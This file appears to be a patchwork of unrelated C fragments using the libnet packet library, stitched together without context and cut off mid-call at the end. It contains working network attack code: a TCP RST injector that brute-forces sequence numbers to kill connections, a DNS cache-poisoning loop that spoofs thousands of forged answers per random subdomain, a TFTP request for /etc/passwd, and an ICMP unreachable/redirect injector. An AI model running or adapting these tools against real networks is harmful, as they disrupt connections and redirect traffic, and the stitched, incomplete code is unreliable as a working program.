int
main(int argc, char **argv)
{
int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];
memset(&stat, 0, sizeof(stat));
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
usage(argv[0]);
}
if (optind < argc)
usage(argv[0]);
if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);
if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {
tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
usleep(timeout);
}
libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);
bad:
libnet_destroy(l);
exit(-1);
}
/*
-- FUNCTION: forward
--
-- DATE: March 13, 2012
--
-- REVISIONS: (Date and Description)
--
-- DESIGNER: Luke Queenan
--
-- PROGRAMMER: Luke Queenan
--
-- INTERFACE: void forward(u_char *args, const struct pcap_pkthdr *header, const u_char *packet);
--
-- RETURNS: void
--
-- NOTES:
-- This is the function that deals with the actual forwarding of packets. It
-- is called by the libpcap loop when a packet matching the filter is detected.
-- This function breaks the packet down and creates it using the libnet library
-- calls. The packet is then forwarded to the relevent machine.
*/
void forward(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
const struct sniff_ip *ip = NULL;
const struct sniff_tcp *tcp = NULL;
const struct sniff_udp *udp = NULL;
info *myInfo = (info*)args;
int ipHeaderSize = 0;
int tcpHeaderSize = 0;
int payloadSize = 0;
libnet_ptag_t ptag;
u_short sport = 0;
u_short dport = 0;
struct in_addr src_ip;
struct in_addr dst_ip;
/* Get the IP header and offset value */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
ipHeaderSize = IP_HL(ip) * 4;
if (ipHeaderSize < 20)
{
return;
}
/* Determine the protocol and handle it */
if (ip->ip_p == IPPROTO_TCP)
{
/* Get tcp header along with its size */
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + ipHeaderSize);
tcpHeaderSize = TH_OFF(tcp) * 4;
if (tcpHeaderSize < 20)
{
return;
}
/* If we are the external filter, check to see if the SYN bit is set */
if ((myInfo->externFilter == '1') && ((tcp->th_flags & TH_SYN) == TH_SYN))
{
/* Add the data to the map */
addRuleToMaps(ip->ip_src.s_addr, tcp->th_sport, tcp->th_dport);
}
/* Get the size of the payload */
payloadSize = ntohs(ip->ip_len) - (ipHeaderSize + tcpHeaderSize);
/* Get the source and destination information from the map */
if (myInfo->externFilter == '1')
{
/* We are sending packets to the internal machine */
/* Get the forwarding machine's return port */
if (cliFind(ip->ip_src.s_addr, tcp->th_sport, &sport) == 0)
{
return;
}
/* Get the internal machine's listening port and IP for this port */
rlFind(tcp->th_dport, &dport, &dst_ip.s_addr);
src_ip.s_addr = ip->ip_dst.s_addr;
}
else
{
/* We are sending packets out to the world */
/* Find the client to forward the packet to */
if (srvFind(tcp->th_dport, &dst_ip.s_addr, &dport, &sport) == 0)
{
return;
}
/* Set the IP address */
src_ip.s_addr = ip->ip_dst.s_addr;
}
/* Make the new TCP header */
ptag = libnet_build_tcp(
htons(sport), /* source port */
htons(dport), /* destination port */
ntohl(tcp->th_seq), /* sequence number */
ntohl(tcp->th_ack), /* acknowledgement num */
tcp->th_flags, /* control flags */
tcp->th_win, /* window size */
0, /* checksum */
tcp->th_urp, /* urgent pointer */
tcpHeaderSize + payloadSize, /* TCP packet size */
(u_char *)tcp + tcpHeaderSize, /* payload */
payloadSize, /* payload size */
myInfo->myPacket, /* libnet handle */
0); /* libnet id */
/* Error check */
if (ptag == -1)
{
libnet_clear_packet(myInfo->myPacket);
return;
}
}
else if (ip->ip_p == IPPROTO_UDP)
{
/* Grab the UDP packet */
udp = (struct sniff_udp*)(packet + SIZE_ETHERNET + ipHeaderSize);
/* If we are the external filter, make sure that we have a rule added */
if (myInfo->externFilter == '1')
{
addRuleToMaps(ip->ip_src.s_addr, udp->uh_sport, udp->uh_dport);
}
/* Get the payload size */
payloadSize = ntohs(udp->uh_len) - SIZE_UDP_HEADER;
/* Get the source and destination information from the map */
if (myInfo->externFilter == '1')
{
/* We are sending packets to the internal machine */
/* Get the forwarding machine's return port */
if (cliFind(ip->ip_src.s_addr, udp->uh_sport, &sport) == 0)
{
return;
}
/* Get the internal machine's listening port and IP for this port */
rlFind(udp->uh_dport, &dport, &dst_ip.s_addr);
src_ip.s_addr = ip->ip_dst.s_addr;
}
else
{
/* We are sending packets out to the world */
/* Find the client to forward the packet to */
if (srvFind(udp->uh_dport, &dst_ip.s_addr, &dport, &sport) == 0)
{
return;
}
/* Set the IP address */
src_ip.s_addr = ip->ip_dst.s_addr;
}
/* Make the new UDP header */
ptag = libnet_build_udp(
htons(sport), /* source port */
htons(dport), /* destination port */
ntohl(udp->uh_len), /* packet size */
0, /* checksum */
(u_char *)udp + SIZE_UDP_HEADER, /* payload */
payloadSize, /* payload size */
myInfo->myPacket, /* libnet handle */
0); /* libnet id */
/* Error check */
if (ptag == -1)
{
libnet_clear_packet(myInfo->myPacket);
return;
}
}
else
{
/* Protocol that we do not handle, exit */
return;
}
/* Make the IP header */
ptag = libnet_build_ipv4(
ipHeaderSize + tcpHeaderSize + payloadSize, /* length */
ip->ip_tos, /* TOS */
ip->ip_id, /* IP ID */
0, /* IP Frag */
ip->ip_ttl, /* TTL */
ip->ip_p, /* protocol */
0, /* checksum */
src_ip.s_addr, /* source IP */
dst_ip.s_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
myInfo->myPacket, /* libnet handle */
0); /* libnet id */
/* Error check */
if (ptag == -1)
{
libnet_clear_packet(myInfo->myPacket);
return;
}
/* Send the packet out */
libnet_write(myInfo->myPacket);
/* Clear the libnet system */
libnet_clear_packet(myInfo->myPacket);
return;
}
int
main(int argc, char *argv[])
{
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
/* src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
*/
while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF)
{
switch (c)
{
case 'p':
strcpy(payload_file, optarg);
break;
case 't':
strcpy(tcp_file, optarg);
break;
case 'i':
strcpy(ip_file, optarg);
break;
case 'e':
strcpy(eth_file, optarg);
break;
default:
break;
}
}
if (optind != 9)
{
usage();
exit(0);
}
i_dns_bind2_addr = libnet_name2addr4(l, dns_bind2_addr, LIBNET_RESOLVE);
sscanf("08, 00, 27, 90, 31, 81", "%x, %x, %x, %x, %x, %x", &res_eth_saddr[0], &res_eth_saddr[1], &res_eth_saddr[2], &res_eth_saddr[3], &res_eth_saddr[4], &res_eth_saddr[5]);
srand((int)time(0));
int loop_counter = 0;
while (1==1) {
int randomNumber = (rand()%10000000);
while (randomNumber<1000000) randomNumber*=10;
sprintf(random_host, ".x-%d.%s", randomNumber,attack_domain);
printf("\nNow attacking with domain %s \n",random_host);
convertDomain();
// load_payload();
load_payload_query(); // get the new payload with random subdomain
load_ethernet();
load_tcp_udp();
load_ip();
convert_proto();
if(ip_proto_val==IPPROTO_TCP){
t = libnet_build_tcp(
t_src_port, /* source port */
t_des_port, /* destination port */
t_seq, /* sequence number */
t_ack, /* acknowledgement num */
t_control_val, /* control flags */
t_win, /* window size */
0, /* checksum */
t_urgent, /* urgent pointer */
LIBNET_TCP_H + payload_filesize, /* TCP packet size */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_TCP_H;
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
}
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_src_port, /* source port */
t_des_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_src_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
// sending the request to the DNS server
free(payload_location);
libnet_destroy(l);
// reinit the handle so that we can set new parameters to the handle.
for (i=0;i<10000;i++) { // loop to send 10000 responses for each request.
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
// reinit the handle for sending responses
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
load_payload_answer();
// generate the response and send it
// change the ports of source port and destination port to match the second DNS query
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_des_port, /* source port */
t_src_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
// change the ethernet headers to match the response from the second DNS server
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_dns_bind2_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
res_eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */
free(payload_location);
libnet_destroy(l);
}
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
loop_counter++;
printf("%d\n", loop_counter);
if(loop_counter == 2){
break;
}
// loop to do for multiple unique requests
}
/* give the buf memory back */
// clear memory
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
// clear memory on failure
}
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) {
/* Builds and sends the first packet, calling get_sum() to
* * get the correct checksum for the ICMP packet (with the
* * whole payload). Then builds and sends IP fragments
* * until all the payload is sent. */
char ip_addr_str[16];
u_int32_t ip_addr, src_addr;
u_int16_t id, seq, ip_id;
/* hdr_offset = fragmentation flags + offset (in bytes)
* * divided by 8 */
int pload_offset, hdr_offset;
int bytes_written, max_pload_size, packet_pload_size;
libnet_ptag_t ip_tag;
/* Generating random IDs */
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* We need a non-zero id number for the IP headers,
* * otherwise libnet will increase it after each
* * build_ipv4, breaking the fragments */
ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
seq = 1;
/* Getting IP addresses */
src_addr = libnet_get_ipaddr4(l);
if (src_addr == -1) {
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Destination IP address: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if (ip_addr == -1) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Getting max payload size */
max_pload_size = (MTU - LIBNET_IPV4_H);
/* making it a multiple of 8 */
max_pload_size -= (max_pload_size % 8);
pload_offset = 0;
/* Building the first packet, which carries the ICMP
* * header */
/* We're doing (payload size - icmp header size) and not
* * checking if it's a multiple of 8 because we know the
* * header is 8 bytes long */
if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) {
hdr_offset = IP_MF;
packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H;
} else {
hdr_offset = 0;
packet_pload_size = total_pload_size;
}
/* ICMP header */
if (libnet_build_icmpv4_echo(ICMP_ECHO, 0,
get_sum(payload, total_pload_size, id, seq), id,
seq, payload, packet_pload_size, l, 0) == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* First IP header (no payload, offset == 0) */
if (libnet_build_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l,
0) == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
/* Clearing */
/* We need to get rid of the ICMP header to build the
* * other fragments */
libnet_clear_packet(l);
ip_tag = LIBNET_PTAG_INITIALIZER;
/* Looping until all the payload is sent */
while (total_pload_size > pload_offset) {
/* Building IP header */
/* checking if there will be more fragments */
if ((total_pload_size - pload_offset) > max_pload_size) {
/* In IP's eyes, the ICMP header in the first packet
* needs to be in the offset, so we add its size to
* the payload offset here */
hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = max_pload_size;
} else {
/* See above */
hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = total_pload_size - pload_offset;
}
ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr,
ip_addr, (payload + pload_offset),
packet_pload_size, l, ip_tag);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
}
}
int main(int argc, char *argv[])
{
int c;
libnet_t *l;
char *device = "eth0";
char *dst = NULL;
char src[HOST_NAME_MAX+1];
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_ptag = 0;
char *cur_host;
int valid;
u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5};
u_long payload_s = 8;
int i;
while ((c = getopt(argc, argv, "d:i:h")) != EOF)
{
switch (c)
{
case 'd':
dst = optarg;
break;
case 'i':
device = optarg;
break;
case 'h':
usage(argv[0]);
exit(EXIT_SUCCESS);
default:
exit(EXIT_FAILURE);
}
}
if (!dst) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
gethostname(src, HOST_NAME_MAX);
cur_host = valid_hosts[0];
for (i=0, valid=0; cur_host; i++) {
if (strstr(cur_host, src)) {
valid = 1;
break;
}
cur_host = valid_hosts[i];
}
if (!valid) {
fprintf(stderr, "Uh uh. I don't think so.\n");
exit(EXIT_FAILURE);
}
l = libnet_init(
LIBNET_RAW4, /* injection type */
device, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", dst);
exit(EXIT_FAILURE);
}
if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", src);
exit(EXIT_FAILURE);
}
ip_ptag = libnet_build_ipv4(
LIBNET_IPV4_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_RESTART, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
ip_ptag); /* libnet id */
if (ip_ptag == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Sent restart packet to %s.\n", dst);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t udp = 0, ip = 0;
char *filename = "/etc/passwd";
char mode[] = "netascii";
u_char *payload = NULL;
uint32_t payload_s = 0;
printf("libnet 1.1 packet shaping: UDP + payload[raw] == TFTP\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
goto bad;
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
goto bad;
}
break;
case 'p':
filename = optarg;
break;
default:
fprintf(stderr, "unkown option [%s]: bye bye\n", optarg);
goto bad;
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* build payload
*
* 2 bytes string 1 byte string 1 byte
* ------------------------------------------------
* | Opcode | Filename | 0 | Mode | 0 |
* ------------------------------------------------
*
*/
payload_s = 2 + strlen(filename) + 1 + strlen(mode) + 1;
payload = malloc(sizeof(char)*payload_s);
if (!payload)
{
fprintf(stderr, "malloc error for payload\n");
goto bad;
}
memset(payload, 0, payload_s);
payload[1] = 1; /* opcode - GET */
memcpy(payload + 2, filename, strlen(filename));
memcpy(payload + 2 + strlen(filename) + 1 , mode, strlen(mode));
/*
* Build pblocks
*/
udp = libnet_build_udp(
0x1234, /* source port */
69, /* destination port */
LIBNET_UDP_H + payload_s, /* packet length */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length - dont forget the UDP's payload */
0, /* TOS */
0x4242, /* IP ID */
0, /* IP Frag */
0x42, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload (already in UDP) */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TFTP packet; check the wire.\n", c);
}
libnet_destroy(l);
free(payload);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(payload);
return (EXIT_FAILURE);
}
/* Send an ICMP packet, such as host unreachable, to the source and destination addresses */
void
rst_icmp_send(pkt_t *rst)
{
struct ip *ih = NULL;
struct tcphdr *th = NULL;
int pair = 0;
char *state = NULL;
size_t icmp_len = 0;
ih = (struct ip *)(rst->pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(rst->pkt + sizeof(struct ether_header) + sizeof(struct ip));
/* The interface described in "Building Open Source Network Security Tools"
* appears to be deprecated. The new interface tunnels an IPv4 packet
* within the ICMP unreachable using the libnet context.
*/
switch (rst->icmp.type) {
/* RFC 792
*
* Type 3
*
* Codes 0, 1, 4, and 5 may be received from a gateway. Codes 2 and
* 3 may be received from a host.
*
* 0 = net unreachable;
* 1 = host unreachable;
* 2 = protocol unreachable;
* 3 = port unreachable;
* 4 = fragmentation needed and DF set;
* 5 = source route failed.
*
*/
case ICMP_UNREACH:
icmp_len = LIBNET_ICMPV4_UNREACH_H + LIBNET_IPV4_H + ICMP_PKTLEN;
LIBNET_ERR(libnet_build_icmpv4_unreach(
rst->icmp.type, /* ICMP type, e.g. 3 (Unreachable) */
rst->icmp.code, /* ICMP code, e.g., 1 (Bad Host) */
0, /* auto checksum */
(u_char *)ih, /* payload */
LIBNET_IPV4_H + ICMP_PKTLEN, /* payload size */
rst->l, /* libnet context */
0 /* ptag */
));
break;
/*
* Type 5
*
* Codes 0, 1, 2, and 3 may be received from a gateway.
*
* 0 = Redirect datagrams for the Network.
* 1 = Redirect datagrams for the Host.
* 2 = Redirect datagrams for the Type of Service and Network.
* 3 = Redirect datagrams for the Type of Service and Host.
*
*/
case ICMP_REDIRECT:
icmp_len = LIBNET_ICMPV4_REDIRECT_H;
LIBNET_ERR(libnet_build_icmpv4_unreach(
rst->icmp.type,
rst->icmp.code,
0,
(u_char *)ih,
LIBNET_IPV4_H + ICMP_PKTLEN,
rst->l,
0));
break;
/*
* Type 11
*
* Code 0 may be received from a gateway. Code 1 may be received
* from a host.
*
* 0 = time to live exceeded in transit
* 1 = fragment reassembly time exceeded
*
*/
case ICMP_TIMXCEED:
icmp_len = LIBNET_ICMPV4_TIMXCEED_H + LIBNET_IPV4_H + ICMP_PKTLEN;
LIBNET_ERR(libnet_build_icmpv4_timeexceed(
rst->icmp.type,
rst->icmp.code,
0,
(u_char *)ih,
LIBNET_IPV4_H + ICMP_PKTLEN,
rst->l,
0));
break;
case ICMP_PARAMPROB:
case ICMP_SOURCEQUENCH:
errx(EXIT_FAILURE, "Not supported by libnet.");
break;
default:
errx(EXIT_FAILURE, "ICMP type %d is not supported yet\n",
rst->icmp.type);
}
LIBNET_ERR(libnet_build_ipv4(
LIBNET_IPV4_H + icmp_len, /* payload size */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* TOS */
ntohs(ih->ip_id)+1, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_ICMP, /* Protocol */
0, /* auto checksum */
ih->ip_dst.s_addr, /* source */
ih->ip_src.s_addr, /* destination */
NULL, /* payload */
0, /* payload size */
rst->l, /* libnet context */
0 /* libnet ptag */
));
state = ((libnet_write(rst->l) == -1) ? "x" : "I");
(void)fprintf(stdout, "[%s] SRC = %15s:%-6u DST = %15s:%-6u len = %d/%d\n", state,
libnet_addr2name4(PAIR(pair, ih->ip_src.s_addr, ih->ip_dst.s_addr), LIBNET_DONT_RESOLVE),
PAIR(pair, ntohs(th->th_sport), ntohs(th->th_dport)),
libnet_addr2name4(PAIR(pair, ih->ip_dst.s_addr, ih->ip_src.s_addr), LIBNET_DONT_RESOLVE),
PAIR(pair, ntohs(th->th_dport), ntohs(th->th_sport)), LIBNET_IPV4_H + (u_int32_t)icmp_len, ntohs(ih->ip_len));
(void)fflush(stdout);
usleep(rst->sleep_for);
}
int main() {
libnet_t *handle; /* Libnet handler */
int packet_size;
char *device = "10.1.2.3"; /* device name */
char *src_ip_str = "10.1.2.3"; /* Source IP String*/
char *dst_ip_str = "10.1.2.2"; /* Destination IP String*/
u_char src_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; /* Source MAC */
u_char dst_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x01}; /* Destination MAC */
u_long dst_ip, src_ip;
char error[LIBNET_ERRBUF_SIZE];
libnet_ptag_t eth_tag, ip_tag, tcp_tag, tcp_op_tag;
u_short proto = IPPROTO_TCP; /* Transport layer protocol*/
u_char payload[1400] = {0};
u_long payload_s = 0; /* length of payload */
/* Turn IP string to IP(little endian)*/
dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
/* init Libnet */
if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) {
printf("libnet_init failure\n");
return (-1);
};
strncpy(payload, "123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678", sizeof(payload)-1); /* load construct */
payload_s = strlen(payload);
printf("%lu\n",payload_s);
#if 0
/* produce TCP */
tcp_op_tag = libnet_build_tcp_options(
payload,
payload_s,
handle,
0
);
if (tcp_op_tag == -1) {
printf("build_tcp_options failure\n");
return (-2);
};
#endif
tcp_tag = libnet_build_tcp(
30330, /* Source port */
30331, /* Destination port */
8888, /* sequence number */
8889, /* acknowledgement number */
TH_PUSH | TH_ACK, /* Control flags */
